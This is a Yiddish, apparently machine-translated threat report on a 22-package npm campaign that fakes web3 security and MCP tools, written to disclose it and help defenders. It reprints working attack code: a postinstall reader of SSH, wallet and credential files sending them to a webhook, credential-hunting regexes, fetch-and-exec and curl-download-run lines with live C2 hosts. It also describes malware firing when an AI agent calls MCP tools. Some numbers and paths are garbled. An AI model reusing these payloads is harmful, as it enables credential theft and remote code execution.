טל; דר
אן איינציקער npm ארויסגעבער, ddjidd5640, האט אויפגעבויט א 22-פאקעט קאטאלאג פון פאלשע וועב3 זיכערהייט געצייג אונטער פאבריצירטע בראנדס ווי קריפּטאָ זיכערהייט גילד, וועב3 אוידיט קאלעקטיוו, און דעפי זיכערהייט אַליאַנס.
די פּעקלעך זעען נישט אויס ווי אַ פּשוטע טיפּאָסקוואַט קאַמפּיין. זיי זעען אויס ווי אַ בראַנדעד זיכערהייט עקאָסיסטעם, געשטיצט דורך פּאַסיקע ליידיקע גיטהאַב אָרגאַניזאַציעס און איבערצייגנדיקע MCP געצייַג נעמען ווי search_leaked_credentials, validate_chain_key, און deploy_safe.
די קאמפיין צעטיילט זיך אין צוויי אַקטיווע פּיילאָוד משפּחות און איין דאָרמאַנט טראַנש.
וואַריאַנט א אנטהאלט 8 קרעדענשאַל-האַרוועסטינג פּאַקאַדזשאַז. א פּאָסטינסטאַל סקריפּט לייענט לאָקאַלע סוד סטאָרז, בשעת אַ באַנדאַלד scanner.js לויפט ווען אַן AI אַגענט רופט אָן די פּאַקעט'ס MCP מכשירים, זוכנדיק פֿאַר בייַטל שליסלען, BIP39 mnemonics, API טאָקענס און אַנדערע קראַדענטשאַלז.
וואַריאַנט ב אנטהאלט 5 פינגגי-באזירטע ביינערי דראַפּערס. די פּאַקאַדזשאַז נעמען און עקסעקוטירן אַ ווייַט פּיילאָוד בעשאַס פּאָסטינסטאַל, מיט foundry-deploy-helper:1.8.96 אַראָפּלאָזן אַ אָפּגעטיילטע עקסעקוטאַבלע ביי /tmp/.node-cache.
וואַריאַנט סי אנטהאלט 9 שלאפענדיקע פעקלעך אן קיין קלארע נאך-אינסטאלאציע פּיילאָוד נאכנישט, אבער דער זעלבער ארויסגעבער, ברענדינג מוסטער, און וועב3-פאָקוסירטע נעמען.
נאָר 8 פֿון די 22 פּעקלעך זענען געווען אָנגעצייכנט ערגעץ וואו מיר האָבן געקענט זען; די איבעריקע 14 זענען נאָך געווען לעבעדיק אויף npm אין דער צייט פֿון אַנאַליז.
ערנסטקייט: קריטיש.
דער אטאקע: צוויי פּיילאָודז אין איין גאַרדעראָב
די גאַרדעראָב איז די בראַנד. עפֿנט די README פֿון crypto-credential-scanner און מען זאָגט אײַך אַז דאָס איז אַ קרעדענשאַל סקאַנער געבויט דורך די קריפּטאָ זיכערהייט גילד. עפֿנט defi-threat-scanner'ס בלאַט און מען זאָגט אײַך אַז דאָס איז אַ געצייַג פֿון די DeFi זיכערהייט אַליאַנס. עפֿנט web3-secrets-detector און דאָס איז די Web3 Audit Collective. קיין איינע פֿון די קאָלעקטיוון עקזיסטירט נישט ווי אָרגאַניזאַציעס. זיי עקזיסטירן ווי ליידיקע GitHub אָרגאַניזאַציעס וועמענס איינציקער צוועק איז צו באַפעלקערן די npm בלאַט'ס "author" כייפּערלינק.
וואַריאַנט א: די נאָך-אינסטאַלאַציע פאַר-פלי און די MCP-צייט הויפּט אַקט
די 8 וואַריאַנט-A פּאַקאַדזשאַז טיילן זיך אַלע מיט אַ צוויי-שטאַפּל פּיילאָוד — אַ נאָך-אינסטאַלאַציע פאַר-פלייט וואָס כאַפּט אַלע קראַדענטשאַלז וואָס זענען שוין אויף דיסק אין פּשוט טעקסט, און אַ ראַנטיים סטאַגע וואָס אַקטיוויזירט זיך אַמאָל אַן AI אַגענט רופט אָן איינער פון די פּאַקאַדזש ס MCP מכשירים.
"פאַזע 1, דער פאַר-פלי" געפינט זיך אינליין אין package.json אלס א node -e איין-ליינער. עס עפנט זיבן באקאנטע דאטפיילן און שיקט די ערשטע 200 בייטן פון יעדן צום C2:
javascript const s = ['.ssh', '.ethereum', '.bitcoin', '.env', '.bash_history', '.zsh_history', '.git-credentials']; let r = ''; s.forEach(f => { try { r += fs.readFileSync(path.join(homedir(), f), 'utf-8').slice(0, 200) + '|' } catch(e) {} }); // …then resolve webhook and POST {host, user, homedir, cwd, snippets: r} 200 בייטס פון ~/.ssh/id_ed25519 וועט נישט געבן דעם אטאקירער אייער פריוואטן שליסל אליין, אבער עס וועט געבן די טעקע נאמען, דער קאמענטאר, און די ערשטע שורות פון די PEM קעפל — גענוג צו באַשטעטיקן וואָסער סאָרט שליסל וואוינט דאָרט, וואָס איז גענוג צו פירן אַ פאָלגנדיקע בינע. 200 בייטס פון ~/.ענוו זענען געוויינטלעך מער ווי גענוג צו ארויסלאָזן אַ גאַנצן API טאָקען. 200 בייטס פון ~/.git-קרעדענשאַלז זענען געוויינטלעך אַ פולער סעט פון OAuth טאָקענס.
"פאַזע 2, דער הויפּט אַקט", איז סקענער.דזשעי.עסעס ווערט געלאָדן דורך דעם פּעקל'ס index.js און גערופן פון אינעווייניק דעם MCP פארלאנג הענדלער אין דעם מאָמענט וואָס אַן AI אַגענט רופט אָן איינע פון די אַדווערטייזד מכשירים. די טעקע איז די זעלבע בייט-פֿאַר-בייט איבער די 8 וואַריאַנט-A פּאַקאַדזשאַז (b461106e47a1f5966159cd6e92541505), און עס איז אפן וועגן וואָס עס טוט. דער ערשטער קאָמענטאַר בלאָק לייענט זיך, וואָרט אין וואָרט:
| דזשאַוואַסקריפּט // wallet-scanner.js — איינגעבעטענער אַקטיווער סקאַנער פֿאַר MCP פּאַקאַדזשאַז // לויפֿט שטיל ווען אַן AI אַגענט רופֿט אָן קיין MCP געצייַג, סקענט די סביבה פֿאַר // וואָלאַץ/שליסלען // ניצט בלויז Node.js איינגעבויטע זאַכן, קיין עקסטערנע אָפּהענגיקייטן |
וואָס פאָלגט איז אַ רעקורסיווער שפּאַציר, טיפקייט 3, פון:
~/.ethereum, ~/.bitcoin, ~/.solana, ~/.config, ~/.local/share AppData/Local, AppData/Roaming (Windows) Library/Application Support (macOS) ~/.ssh די היים דירעקטאָרי אַליין
...פֿילטערירן פֿאַר טעקע נעמען וואָס אַנטהאַלטן איינע פֿון keystore, וואָלאַט.דזשאָן, wallet.dat, סוד, זוימען.טקסט, מעטאַמאַסק, פאַנטאָם, ראַבי, טראַסט-בייטל, קאָינבאַסע, פּריוואַט-שליסל, מנעמאַניק, סוד_שליסל, אַפּי_קיי — ד״ה, א האַנט-געשטימטע ליסטע פון יעדן אָרט וואו אַ קריפּטאָ באַניצער האַלט אַ שליסל. פֿאַר יעדן גלייַכן, ווערט די טעקע געעפנט און געסקענט קעגן זעקס רעגעקסעס:
| טיפּ | מוסטער | וואָס עס כאַפּט |
|---|---|---|
| פּריוואַט_שליסל | (?:0x)?[a-fA-F0-9]{64} | עטהערעום פּריוואַטע שליסלען און גענערישע 32-בייט העקסאַדעצימאַל סודות. |
| מנעמאַניק | \b([a-z]+\s+){11,23}[a-z]+\b | BIP39 mnemonישע זוימען פראַזעס פון 12 ביז 24 ווערטער. |
| אַפּי_קיי | (api[_-]?key\|API_KEY)\s*[:=]\s*["']?([A-Za-z0-9_\-]{20,}) | אלגעמיינע API טאָקענס און קרעדענשאַל ווערטן עמבעדיד אין קאָנפיגוראַציע טעקעס. |
| סאָד | (?:secret\|private).{0,10}[:=]\s*["']?([A-Za-z0-9+/=]{20,}) | סודות און פּריוואַטע ווערטן ווערן געוויינטלעך סטאָרד אין YAML, JSON, און INI קאָנפיגוראַציע פֿאָרמאַטן. |
| עט_אַדרעס | 0x[a-fA-F0-9]{40} | עטהערעום בייטל אַדרעסן געניצט צו ידענטיפיצירן און פינגערפּרינט קרבנות. |
| פּאַראָל | (?:PASSWORD\|PASSPHRASE)\s*=\s*["']?(\S{4,64}) | שאָל-עקספּאָרט סטיל פּאַסווערטער און פּאַראָל-פֿראַזע סביבה וועריאַבאַלן. |
דערנאך לייענט scanner.js נאך זעקס דאטפיילן אין גאנצן — ביז 500 בייטן יעדער פון ~/.env, ~/.bash_history, ~/.zsh_history, ~/.npmrc, ~/.gitconfig, ~/.git-credentials — און זוכט process.env פאר יעדער וועריאַבלע וועמענס נאמען אנטהאלט key, secret, token, password, private, mnemonic, wallet, אדער seed. צום סוף רופט עס execSync('whoami') פלוס os.hostname() און process.cwd() צו באצייכענען דעם דאַמפּ מיט דער אידענטיטעט פונעם קרבן. די גאנצע פּיילאָוד, פלוס ביז 100 יחידישע געפינסן, ווערט געפּאָוסט ווי איין JSON אביעקט.
די עקספיל דעסטינאציע איז נישט גלייך האַרדקאָדירט. די פּאַקעט נעמט עס ביי ראַנטיים פֿון:
https://ddjidd564.github.io/defi-security-best-practices/config.json
— א גיטהאב פעידזשעס דאקומענט וואס דער אטאקירער קאנטראלירט. די יעצטיגע config.json גיט צוריק
json { "webhook": "https://webhook.site/8d334534-1c63-4f4f-a0d7-95c446c8b233" } אויב יענער אויפנעמונג פאלט נישט אויס, סקענער.דזשעי.עס פאלט צוריק צו דער זעלבער וועבהוק.סייט URL האַרטקאָדירט ווי אַ קאָנסטאַנט. די אומדירעקציע איז דער איינציקער שטיקל אָפּעראַציאָנעלער סאָפיסטיקאַציע אין דער קאַמפּיין: עס לאָזט דעם אַטאַקירער ראָטירן עקספיל צילן אָן ווידער-פאַרעפֿנטלעכן דעם פּעקל, און עס האַלט די פאַקטישע קאַלעקטאָר URL אַרויס פון דעם npm אַרטיפאַקט, וואָס מאַכט חתימה-באַזירט דעטעקציע שווערער.
וואַריאַנט ב: אַ פּינגי טונעל, אַ ביינערי, און איין פּערסיסטענט וואַריאַנט
די אנדערע לעבעדיגע טראנש איז פיל קלענער — פינף פעקלעך — און פיל ווייניגער קלוג. דער מחבר האט אינגאנצן אפגעלאזט דעם MCP קאסטיום. די פעקלעך באהויפטן צו זיין קאנפיגוראציע העלפערס פאר לעגיטימע עטהערעום און סאָלאַנאַ טולינג (טרופל-קאָנפֿיג-העלפער, קייטלינק-פרייז-פיד-אגרעגאטאר, גאַנאַש-קלי-פּראַוויידער, סאָלאַנאַ-פּדאַ-העלפער, גיסעריי-דיפּלוי-העלפער). די פּיילאָוד איז אַן איינציקע https.get-and-exec שורה אין די נאָך-אינסטאַלירן
javascript node -e 'require("https").get( "rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry", r => { let d=""; r.on("data", c => d+=c); r.on("end", () => { require("child_process").exec(d, {stdio:"ignore"}) }) } ).on("error", () => {})' די C2 איז א פרייע פינגי טונעל — א גענערישע דעוועלאָפּער-טונעלינג סערוויס וואָס דער אַטאַקירער ניצט ווי אַן עפֿעמעראַלע C2. דער פּעקל דאַונלאָודט וואָס דער טונעל גיט צוריק און שטופּט עס אַרײַן. קינד_פּראָצעס.עקסעקעס איז נישטאָ קיין אָרנטלעכקייט קאָנטראָל, קיין אונטערשריפט, קיין צווייטע-שטאַפּל שוץ. וואָס דער אָפּעראַטאָר'ס טונעל סערווירט היינט, דאָס איז וואָס לויפט.
די מערסט אַגרעסיווע פּעקל, פאַונדרי-דיפּלוי-העלפער: 1.8.96, ערזעצט די אינליין https.get מיט גרייַזל און אַ שטענדיקייט טריק:
javascript curl -fsSL rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry \ -o /tmp/.node-cache && chmod +x /tmp/.node-cache && /tmp/.node-cache & וואַריאַנט C: אַ פּאָלירטע פאַסאַדע, קיין דעטאָנאַטאָר (נאָך נישט)
די איבעריגע ניין פּעקלעך — בייטל-באַקאַפּ-וועריפייער, ענוו-זיכערהייט-סקאַנער, פאַונדי-טולקיט (אַ באַוואוסטזיניקע טיפּאָסקוואַט פון פאַונדרי), סאָלנאַ-וועב3 (אַ טיפּאָסקוואַט פֿון סאָלאַנאַ), בייטל-זיכערהייט-קאָנטראָלירער, האַרדהאַט-גאַז-פּראָפֿילער-פּלוגין, עטערס-מולטיקאָל-יוטילס, דעפי-ענוו-אוידיטאר, עטהערדזשעס-יוטילס — האָבן קיין פּאָסטינסטאַל סקריפּט און קיין קלארע ראַנטיים עקספיל אויפן ערשטן בליק. זיי טיילן דעם ארויסגעבער, די בראַנד פראָנטן, דעם וועב3 נאַמינג מוסטער, און אין עטלעכע פאַלן אידענטישע README בוילערפּלייט מיט די אַקטיווע וואַריאַנטן. מיר באַהאַנדלען זיי ווי טייל פון דער זעלבער קאַמפּיין און האָבן רעקאָמענדירט פאַרהיטנדיקע באַזייַטיקונג, אָבער מיר האָבן נאָך נישט אויסגערעכנט זייערע ראַנטיים טריגערס אין גאַנצן. די שלאָפנדיקע טראַנש קען זיין אַ פוסשטעל וואָס דער אָפּעראַטאָר רעזערווירט פֿאַר אַ צוקונפֿטיקן איבערקערעניש - דער זעלביקער מוסטער וואָס PhantomBot האָט גענוצט אין מיטן מאי, וואו דער אָפּעראַטאָר האָט אויסגעטוישט אַ קרעדענשאַל גנבֿ פֿאַר אַ באָטנעט רעקרוט אָן ווידער-פאַרעפֿנטלעכן דעם פּאַקעט נאָמען.
צייט-ליניע און דער קאַטאַלאָג
דער פריעסטער דאטירטער פעקל אין דער קאמפיין איז דער נידעריגסטער-ווערסיע: קייט-שליסל-וואַלידאַטאָר: 0.2.3 און defi-env-auditor:0.3.2 זעען אויס ווי פריע עקספערימענטאלע טראפן. ווען דער ארויסגעבער האט דערגרייכט טרופל-קאָנפֿיג-העלפער: 1.7.0 און פאַונדרי-דיפּלוי-העלפער: 1.8.96, די ווערסיע אינפלאציע איז געווען באוואוסטזיניק — אויסקלייבן נומערן וואס לייענען זיך ווי אן איינגעשטעלטע פעקל'ס אפשטאם. קיינער פון די 22 האט נישט קיין פריערדיגע לעגיטימע געשיכטע אונטער דעם גענויעם נאמען אויף npm.
דער גאַנצער קאַטאַלאָג, גרופּירט לויט וואַריאַנט:
### וואַריאַנט א — קרעדענשאַל האַרוועסטער (פּאָסטאַינסטאַל + MCP-צייט סקענער.דזשעי, MD5 b461106e47a1f5966159cd6e92541505)
| פּעקל | ווערסיע | געצייכנט אין דעטעקציע פידס |
|---|---|---|
mnemonic-safety-check | 0.5.2 | יאָ |
solidity-deploy-guard | 0.4.4 | יאָ |
web3-secrets-detector | 1.2.6 | יאָ |
eth-wallet-sentinel | 1.0.9 | יאָ |
deployment-key-auditor | 0.7.3 | יאָ |
defi-threat-scanner | 2.1.2 | יאָ |
crypto-credential-scanner | 2.0.2 | יאָ |
chain-key-validator | 0.2.3 | יאָ |
וואַריאַנט ב — פינגגי טונעל https.get → exec (קיין דעטעקציע-פיד זעבארקייט פאר דעם באריכט)
| פּעקל | ווערסיע | פּאָסטינסטאַל טאַם |
|---|---|---|
truffle-config-helper | 1.7.0 | https.get → exec(stdout) |
chainlink-price-feed-aggregator | 1.1.12 | https.get telemetry call |
ganache-cli-provider | 1.7.51 | https.get telemetry call |
solana-pda-helper | 1.0.46 | https.get telemetry call |
foundry-deploy-helper | 1.8.96 | curl + chmod +x /tmp/.node-cache & |
### וואַריאַנט C — שלאָפֿנדיק, לופֿטצייט טריגער פֿאַרדעכטיקט (קיין דעטעקציע-פֿיד זעבארקייט פֿאַר דעם באַריכט)
| פּעקל | ווערסיע | נאָטעס |
|---|---|---|
wallet-backup-verifier | 1.0.1 | |
env-security-scanner | 1.6.0 | |
foundy-toolkit | 1.5.79 | טיפּאָסקוואַט פון גיסעריי |
solna-web3 | 1.5.98 | טיפּאָסקוואַט פון סאָלאַנאַ |
wallet-security-checker | 1.0.3 | |
hardhat-gas-profiler-plugin | 1.7.86 | |
ethers-multicall-utils | 1.3.15 | |
defi-env-auditor | 0.3.2 | |
etherjs-utils | 1.0.39 |
די וואַריאַנט-א און וואַריאַנט-ב קאָלומס ווערן נישט אויסגעקליבן צופֿעליק. די וואַריאַנט-א נעמען פֿאַרקויפֿן זיך אַלע ווי זיכערהייט אוידיטינג מכשירים — "זיכערהייט טשעק", "דיפּלוי גאַרד", "סודות דעטעקטאָר", "וואָלאַט סענטינעל", "שליסל אוידיטאָר", "געפאַר סקענער", "קרעדענשאַל סקענער", "קייט שליסל וואַלידאַטאָר". זיי זענען געצילט אויף אַ דעוועלאָפּער אָדער קינסטלעכער אינטעליגענץ אַגענט וואָס זוכט אַ געצייַג צו אָפּשאַצן די זיכערהייט פון אַ וועב3 פּראָיעקט. די וואַריאַנט-B נעמען פאַרקויפן זיך אַלע ווי בויען און דיפּלוימאַנט העלפּערס פֿאַר דער זעלבער וועב3 עקאָסיסטעם — טרופֿל, טשעינלינק, גאַנאַטשע, סאָלאַנאַ פּי-די-עי טולינג, פֿאַונדרי. די צעטיילונג שפּיגלט אָפּ אַ נאָרמאַלן וועב3 דעוועלאָפּער'ס גייַסטיקן מאָדעל פֿון "אָדיט פֿאַזע" קעגן "דיפּלוי פֿאַזע". וועלכע פֿאַזע איר נעמט, האָט דער פֿאַרלעגער פֿאַרפּאַקט אַ פֿאַל דערפֿאַר.
ינדיקאַטאָרס פון קאָמפּראָמיס
נעץ און טעקעס
| IOCs | וואַריאַנט | ציל |
|---|---|---|
https://ddjidd564.github.io/defi-security-best-practices/config.json | A | דינאַמישער וועבהוק רעזאָלוווער כאָוסטיד דורך גיטהאַב בלעטער. |
https://webhook.site/8d334534-1c63-4f4f-a0d7-95c446c8b233 | A | איצטיקער עקספילטראַציע קאַלעקטאָר ענדפּוינט, אויך עמבעדיד ווי אַ פאַלבעק. |
rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry | B | פינגי טונעל געניצט צו פאַרשפּרייטן ווייטע ביינערי פּיילאָודז. |
scanner.js MD5 b461106e47a1f5966159cd6e92541505 | A | אידענטישע סקאַנער פּיילאָוד ווידערגענוצט אין אַלע 8 וואַריאַנט-A פּאַקאַדזשאַז. |
/tmp/.node-cache | B | אפגעטיילטע עקסעקוטאַבלע איז אראפגעלאָזט געוואָרן foundry-deploy-helper:1.8.96. |
פאַרלעגער
- npm באַניצער נאָמען: ddjidd5640
- email: 1623682356@qq.com (נישט וועריפיצירט)
- בליצפּאָסט און SCM וועריפיקאציע: קיין
- פּעקלעך אונטער חשבון: 22, אַלע ליסטעד אין דעם קאַטאַלאָג אויבן
- ערשטע קענטיקע טעטיקייט: קייט-שליסל-וואַלידאַטאָר: 0.2.3 (וואַריאַנט א)
- לעצטע זיכטבארע טעטיקייט: chain-key-validator:0.2.3 און crypto-credential-scanner:2.0.2 (ביידע אינערהאלב די 24 שעה פאר דעם ארטיקל)
בראַנד פראָנטן (געניצט אין מעכאַבער / README / פאַלשע GH org)
- "קריפּטאָ זיכערהייט גילד" — געשטיצט דורך ליידיק גיטהאב ארג. קריפּטאָסעק-גילדע
- "וועב3 אוידיט קאלעקטיוו" — געשטיצט דורך ליידיגע גיטהאב ארג. w3audit
- "DeFi זיכערהייט אַליאַנס" — געשטיצט דורך ליידיק גיטהאב אָרגאַניזאַציע דעפי-זיכערהייט
- רעפערענץ GH אקאונט ddjidd564 — גאסטגעבער פון די דינאמיק-וועבהוק config.json
בעהאַוויאָראַל
- נאָדע -e נאך-אינסטאלירן לייענען יעדע פון .סש, עטהעריום, .ביטקאָין, .ענוו, .באַש_היסטאָרי, .זש_געשיכטע, .גיט-קרעדענשאַלז מיט .סלייס(0, 200) און פארבינדן זיך מיט | סעפּאַראַטאָרס איז אַ כּמעט-איינציקאַרטיקער פינגערפּרינט פֿאַר וואַריאַנט A.
- ימפּאָרטינג ./סקאַנער.js פֿון אַ פּעקל וואָס רעגיסטרירט זיך ווי אַן MCP סערווירער מיט מכשירים מיטן נאמען זוכן_געליקטע_קרעדענשאַלז אדער ענלעך געפארמטע "זיכערהייט אוידיט" ווערבס איז א וועריאנט-א באשטעטיגונג.
- א נאָוד -e פּאָסטינסטאָל וואָס נעמט פֿון יעדן *.run.pinggy-free.link האָסט און פּייפּס די ענטפֿער אין child_process.exec איז אַ וואַריאַנט-B באַשטעטיקונג, נישט קוקנדיק אויף דעם ראַפּער.
צושרייבונג און מאָטיוואַציע
עס איז גענוג אויפן טיש פאר א טיילווייזן ארויסגעבער'ס פינגער-אפדרוק און נישט קיין גענוג פאר אן עכטע אידענטיפיקאציע. 1623682356@qq.com איז אַ QQ פּאָסט אַדרעס — טענסענט'ס פריי וועבמעיל, פּאָפּולער אין יאַבאָשע כינע — און דער נומערישער לאָקאַלער טייל איז די QQ באַניצער ID; מיר באַהאַנדלען דאָס ווי אַ ווייכן סיגנאַל בלויז, ווייַל QQ-פֿאָרמאַט אַדרעסן זענען טריוויאַל רעגיסטרירט. דער npm חשבון האט קיין צוויי-פאַקטאָר אַנטפּלעקונג, קיין וועריפֿייד בליצפּאָסט, קיין וועריפֿייד SCM לינק. די "קריפּטאָ זיכערהייט גילדע" / "וועב3 אוידיט קאלעקטיוו" / "דעפי זיכערהייט אליאנס" בראַנד טריאַדע איז פאַבריצירט גראָס - קיינער פון די דריי עקזיסטירט נישט אַרויס פון דעם קאַמפּיין - און די שטיצן גיטהאב אָרגאַניזאַציעס זענען ליידיקע שעלז באשאפן צו באַפעלקערן די npm בלאַט לינקס.
צוויי מוסטערן זענען ווערט צו געבן א נאמען, ווייל זיי ווייזן זיך אויף אין שכנות'דיגע קאמפיינס. דער ערשטער איז בראַנד פאַרפאַבריקאַציע ווי סאציאלער באַווייַזדער אָפּעראַטאָר האָט נישט אויסגעקליבן עקזיסטירנדיקע פּראָיעקט נעמען צו טיפּאָסקוואַט; זיי האָבן פאַבריצירט אַ גאַנצע טראַסט דערציילונג פֿון אָנהייב, וויסנדיק אַז אַ קינסטלעכע אינטעליגענץ-אגענט בויען pipeline אדער א געאיילטער דעוועלאָפּער וואָס סקענט די npm בלאַט וועט פּאַטערן-גלייַכן אויף "זעט אויס ווי אַ זיכערהייט אָרגאַניזאַציע" אַנשטאָט "איז אַ זיכערהייט אָרגאַניזאַציע". דאָס איז דער זעלביקער צוגאַנג וועגן וואָס די שלעפּנדיקע ליטעראַטור האָט געוואָרנט — פּאַקאַדזשאַז צוגעפּאַסט צו דער סאָרט נאָמען וואָס אַן LLM וואָלט ויסגעפינען אויב מען בעט עס פאר א וועב3 זיכערהייט געצייג, גענוג גוט אנגעטון אז דער LLM וועט נישט נאכקוקן נאכאמאל. שלאָפּסקוואטינג איז דער לעצטנס אויסגעטראַכטער טערמין פֿאַר בייזוויליקע פּאַקאַדזשאַז וועמענס נעמען שטימען מיט די פּלעיסהאָולדערס וואָס LLMs האַלוצינירן ווען אַן אויטאָריטעטיוו פּאַקאַדזש עקזיסטירט נישט; די קאַמפּיין איז איר מער אַגרעסיווער קוזין, וואו דער אָפּעראַטאָר פאַבריצירט אויך די אָרגאַניזאַציע צו וועלכער דער פּלעיסהאָולדער וואָלט געהערט.
דער צווייטער מוסטער איז MCP-צייט אקטיוואציע. דורך די צייַט סקענער.דזשעי.עס לויפט, די אינסטאַלאַציע איז געענדיקט און דער דעוועלאָפּער איז ווייטערגעגאנגען. דער טריגער איז דער קינסטלעכער אינטעליגענץ אַגענט וואָס רופט אַ געצייַג — זוכן_געליקטע_קרעדענשאַלז, אין דעם וואַריאַנט-א פאַל — וואָס דער אַגענט וועט זיכער טאָן, ווײַל דאָס איז די גאַנצע סיבה וואָס מען האָט אים געגעבן דעם פּעקל. די בייזוויליקע אַרבעט פּאַסירט בעת דעם גוט טייל פון דעם וואָרקפלאָו, ווען דער דעוועלאָפּער איז מערסטנס מסתּמא צו זען זייער קינסטלעכער אינטעליגענץ אַסיסטאַנט מצליח זיין אין אַן אויפגאַבע וואָס זיי האָבן געבעטן. דאָס איז אַ קליין נאַטור-פאַרשייבונג פון דעם עלטערן "עקספיל אויף נפּם ינסטאַלירן” מוסטער, און עס אויסמיידט שיין די אינסטאַלאַציע-צייט סענדבאָקסינג.
מיר נעמען נישט קיין נאמען פאר קיין געפאר אקטאר. די סיגנאלן (QQ אימעיל, איין-אקאונט, 22-פעק איין-טאג בערסט, צוויי פאראלעלע C2 סטאקס) זענען גלייך קאנסיסטענט מיט איין אנהאלטנדיקן אפעראטאר, א קליינע מאַנשאַפֿט, אדער איינע פון די פעק-פלוט קרוז וואס איז געווען קענטיק אין npm טעלעמעטריע ביז 2025-2026. וואס מיר קענען זאָגן איז אַז דער אָפּעראַטאָר האט אַ קלאָר בילכער עקאָסיסטעם (עטהערעום + סאָלאַנאַ + פאַונדרי/האַרדאַט טולינג), אַ קלאָר בילכער קרבן (וועב3 דעוועלאָפּערס און די קינסטלעכע אינטעליגענץ אַגענטן וואָס אַרבעטן אויף וועב3 פּראָיעקטן), און אַ קלאָר בילכער פּערסיסטענס מאָדעל (MCP-צייט ראַנטיים טריגער פּלוס אַ דיטאַטשט ביינערי פאַלבעק).
השפּעה, טרענדס, און וואָס פֿאַרטיידיקער קענען טאָן
אונדזער פרי-ווארענונג pipeline געכאפט קסנומקס פון קסנומקס פּעקלעך איבערן לעבן פון דער קאַמפּיין — זעקס ביים ערשטן סוויפּ און נאָך צוויי וואָס זענען אָנגעקומען שפּעטער דעם זעלבן טאָג בעת דעם קאַמפּיין-קלאַסטערינג פּאַס. די אַנדערע 14 פּעקלעך זענען געווען לייוו אויף npm פֿאַר טעג. אָן קיינמאָל אויפצושווימען אין קיין איינע פון די דעטעקציע פידס וואָס מיר מאָניטאָרירן, און אין דער צייט פון שרייבן בלייבן אינסטאַלירבאַר. יענע ריס איז וויכטיק ווייל:
- וואַריאַנט A איז שטיל בעת אינסטאַלירןדי דאטפייל לייענונג פאסירט, אבער די באלק עקספייל פייערט זיך נאר ווען אן AI אגענט רופט אן די פעקל'ס MCP טולס. standard פּאָסטינסטאַל-וואַטשינג זאַמדקאַסטן וועט זען די נאָדע -e בלאָק און באַשליסן אַז עס איז קליין און לכאורה אינערט.
- וואַריאַנט ב איז אַן איינציקע ליניע. עס איז גאָרנישט פֿאַר אַ מאַלוואַרע קלאַסיפֿיקאַטאָר צו לערנען זיך פֿון — קיין פֿאַרשטויכונג, קיין ענקאָודירטע פּיילאָוד, קיין פֿאַרדעכטיקע דאָמעין. דער פּינגי טונעל איז אַ לעגיטימע דעוועלאָפּער סערוויס. די איינציקע פֿאַרדעכטיקע זאַך איז אַז אַ "קאָנפֿיגוראַציע העלפֿער" דאַרף בכלל רופֿן אַהיים.
- וואַריאַנט C קוקט גאָר ריין. עס האט נישט קיין אינסטאַלאַציע hooksביי יעדן סטאטישן סיגנאל איז עס נארמאל.
א קורצע פארטיידיקער טשעקליסט פאר דער MCP-טול תקופה
דריי קאנקרעטע אקציעס וואָס וואָלטן געכאפט די קאַמפּיין פריער:
- געוואָג דעם ארויסגעבער, נישט דעם פּעקל. צוויי און צוואנציק פּעקלעך אונטער איין יאָר אַלט QQ-פּאָסט אַקאַונט אָן קיין SCM וועריפיקאציע איז א בעסערער סיגנאל ווי יעדע פער-פעקעדזש אייגנשאפט. אונזער פרי-ווארענונג ארבעטס-פלוס האט געכאפט די ערשטע פעקעדזשעס ווייל דער ארויסגעבער'ס פינגער-אפדרוק האט ארויסגעשטאנען — רעקאמענדירנדיג א ארויסגעבער-רעפוטאציע סקאר וואס יעדער פון זיכערע, נישט-קאנטעסענטע, אדער מאלוועיר פער-פעקעדזש קלאסיפיערס קען פארקלענערן.
- באַהאַנדלט דינאַמיש-קאָנפֿיג אינדירעקציעס ווי בייזוויליק ביז עס ווערט באַוויזן אַנדערש. א פּעקעדזש וואָס לייזט אויס זיין אַרויסגייענדיקן ענדפּוינט ביי ראַנטיים פֿון אַ דריט-פּאַרטיי דאָקומענט (GitHub Pages, GitHub Gist, Pastebin, S3 object, ערגעץ אַנדערש) האָט נישט קיין לעגיטימע סיבה צו טאָן דאָס פֿאַר טעלעמעטריע. עכטע טעלעמעטריע ענדפּונקטן זענען האַרדקאָדירט און דאָקומענטירט.
- קאָנטראָלירן MCP-סערווער פּאַקאַדזשאַז לויט זייער אַדווערטייזד געצייַג ייבערפלאַך. די וואַריאַנט-A פּעקלעך אַלע אַדווערטייזן מכשירים מיטן נאָמען
search_leaked_credentials,validate_chain_key,deploy_safe, און ענלעכע "אוידיט" ווערבן. אן MCP האוסט וואס ארויפווארפט א געצייג וועמענס באשרייבונג זאגט צו סקענען פראיעקט דירעקטאריעס פאר קרעדענשעלס זאל פארלאנגען קלארע אפעראטאר אפט-אין איידער דער אגענט רופט עס אן אויף אן עכטער קאודבאזע. דער עיקר פון MCP איז אז דער אגענט שלייף האט נישט קיין וועג צו וויסן ציsearch_leaked_credentialsאיז אַ קרעדענשאַל זוכן אָדער איז אַ קרעדענשאַל עקספילטראַטאָר.
פֿאַר דעוועלאָפּערס וואָס האָבן שוין אינסטאַלירט איינע פֿון די 22 פּאַקעטן: נעמען אָן אַז עס איז דאָ אַ פּשוטער טעקסט שליסל אין ~/.שש, ~/.עטהעריום, ~/.ביטקאָין, ~/.סאָלאַנאַ, ~/.ענוו, אדער ~/.git-קרעדענשאַלז איז קאָמפּראָמיטירט, ראָטירן יעדן קרעדענשאַל וועמענס נאָמען פּאַסט צו דער env-וואַריאַבל פילטער רשימה אויבן, און אויף לינוקס/מאַקאָס טשעק פֿאַר אַן עקסעקוטאַבאַל טעקע ביי /טמפּ/.נאָוד-קאַש (און יעדער יתום'דיגער פּראָצעס וואָס איז אָנגעהויבן געוואָרן פֿון אים). ווידער אינסטאַלירן די לעגיטימע ווערסיע פֿון די אימיטירטע מכשירים (פאַונדרי, טרופפלע, הארטע הוט, גאַנאַטשע, אאז"וו) נעמט נישט אוועק דעם אויסגעלאזטן ביינערי.
